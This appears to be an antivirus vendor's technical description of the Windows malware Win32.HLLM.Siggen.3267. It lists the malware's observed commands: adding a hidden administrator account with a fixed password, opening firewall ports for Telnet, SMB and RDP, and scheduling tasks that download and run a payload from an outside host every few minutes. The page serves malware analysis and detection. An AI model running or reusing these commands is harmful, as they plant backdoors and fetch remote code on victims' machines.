Win32.HLLM.Siggen.3267

Technical Information

To ensure autorun and distribution

Creates the following services

'umbus' system32\DRIVERS\umbus.sys

Malicious functions

Executes the following

'%WINDIR%\syswow64\net.exe' user Remo 123456 /add
'%WINDIR%\syswow64\net.exe' localgroup "Administradores" Remo /add
'%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 23 TELNET enable subnet
'%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 139 mameda enable subnet
'%WINDIR%\syswow64\netsh.exe' firewall add portopening UDP 137 mameda enable subnet
'%WINDIR%\syswow64\netsh.exe' firewall add portopening UDP 138 mameda enable subnet
'%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 445 mameda enable subnet
'%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 3389 mameda enable subnet

Modifies file system

Creates the following files

%WINDIR%\play.dll
%WINDIR%\wget.exe
<SYSTEM32>\microsoft\protect\s-1-5-20\574c1b9e-1577-4a13-ace3-a7616e8fef7d
<SYSTEM32>\microsoft\protect\s-1-5-20\preferred
%ALLUSERSPROFILE%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_0cb67e2f-dc95-45ca-8fb8-69bde8e3f814

Network activity

UDP

DNS ASK ca#####tocantins.com.br

Miscellaneous

Searches for the following windows

ClassName: 'EDIT' WindowName: ''
ClassName: 'MS_WINHELP' WindowName: ''

Executes the following

'%WINDIR%\syswow64\rundll32.exe' %WINDIR%\Play.dll Registrar
'%WINDIR%\syswow64\attrib.exe' -h C:\Arquiv~1\Scpad
'%WINDIR%\syswow64\regsvr32.exe' /S \\rjcusrpzqz\DiscoLocal$\star.dll
'%WINDIR%\syswow64\net1.exe' localgroup "Administradores" Remo /add
'%WINDIR%\syswow64\schtasks.exe' /create /tn UpdateWIN1 /tr "wget http://youtubemobiile.com/updt/updt.txt -O %WINDIR%\Config\001.exe" /sc minuto /mo 5 /ru Remo /rp 123456
'%WINDIR%\syswow64\schtasks.exe' /create /tn UpdateWIN2 /tr "%WINDIR%\Config\001.exe" /sc minuto /mo 8 /ru Remo /rp 123456
'%WINDIR%\syswow64\net1.exe' user Remo 123456 /add
'%WINDIR%\syswow64\net1.exe' start Telnet
'%WINDIR%\syswow64\net.exe' start Telnet
'%WINDIR%\syswow64\sc.exe' config TlntSvr start= auto
'%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 139 mameda enable subnet' (with hidden window)
'%WINDIR%\syswow64\net.exe' start Telnet' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' firewall add portopening UDP 138 mameda enable subnet' (with hidden window)
'%WINDIR%\syswow64\attrib.exe' -h C:\Arquiv~1\Scpad' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 3389 mameda enable subnet' (with hidden window)
'%WINDIR%\syswow64\net.exe' localgroup "Administradores" Remo /add' (with hidden window)
'%WINDIR%\syswow64\schtasks.exe' /create /tn UpdateWIN2 /tr "%WINDIR%\Config\001.exe" /sc minuto /mo 8 /ru Remo /rp 123456' (with hidden window)
'%WINDIR%\syswow64\schtasks.exe' /create /tn UpdateWIN1 /tr "wget http://youtubemobiile.com/updt/updt.txt -O %WINDIR%\Config\001.exe" /sc minuto /mo 5 /ru Remo /rp 123456' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 23 TELNET enable subnet' (with hidden window)
'%WINDIR%\syswow64\sc.exe' config TlntSvr start= auto' (with hidden window)
'%WINDIR%\syswow64\net.exe' user Remo 123456 /add' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' firewall add portopening UDP 137 mameda enable subnet' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 445 mameda enable subnet' (with hidden window)

テクノロジー

用語

トレーニングコースおよび啓蒙プロジェクト

アンチウイルスに関する誤解と噂

Technical Information